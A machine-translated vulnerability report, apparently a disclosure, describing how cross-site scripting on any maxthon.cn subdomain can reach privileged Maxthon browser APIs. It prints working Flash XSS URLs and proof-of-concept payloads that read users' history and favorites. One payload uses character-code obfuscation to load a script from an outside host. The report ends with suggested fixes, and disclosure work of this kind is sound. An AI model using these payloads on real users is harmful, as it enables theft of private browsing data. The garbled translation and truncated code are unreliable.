The design defect of Ao you browser may lead to the reading of sensitive information such as user favorites/historical records.
A series of problems caused by design defects
Considering the user experience, the Browser allows the * .maxthon.cn domain to call some privileged APIs,
For example, modify the homepage:
Maxthon. browser. config. ConfigManager. set ("maxthon. config", "browser. general. startpage", "http://wooyun.org ");
Any * .maxthon.cn can call the above api.
You can also install the plug-in through external. mxCall.
But is that true? In fact, I found that apart from I .maxthon.cn, any * .maxthon.cn can read history records. You can obtain the corresponding xss information.
Of course, this is definitely not just a historical record, but also a collection. Here I will provide two poc demos. I hope that maxcompute will consider the API permissions in future versions, avoid any * .maxthon.cn xss to read sensitive information such as your favorites and historical records.
Both xss and xss are flash xss. For this reason, it will not be blocked by the browser:
Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (1 )}};//
Http://skin.maxthon.cn//swfupload/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (1 )}};//
Read history poc:
Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (JSON. stringify (maxthon. browser. history. HistoryManager. getLastOpenList ()));}};//
Read user favorites poc:
For (var I = 0; I
Console. log (maxthon. browser. favorites. FavManager. getMostVisitNodes () [I]. url _)
}
Url:
Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; eval ('window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,119,117,116,111,110,103,121,117, 46,105,110,102,111, 47,109, 97,120,116,104,111,110, 46,106,115,); document. body. appendChild (window. s )')}};//
The effect is as follows:
Solution:
Fix xss. You can replace the swf here in the http://bbs.open.qq.com/static/image/common/swfupload.swf with your swf to fix the xss.
Adjust the policy to prevent any sub-site xss from affecting users' favorites, historical records, and other sensitive information.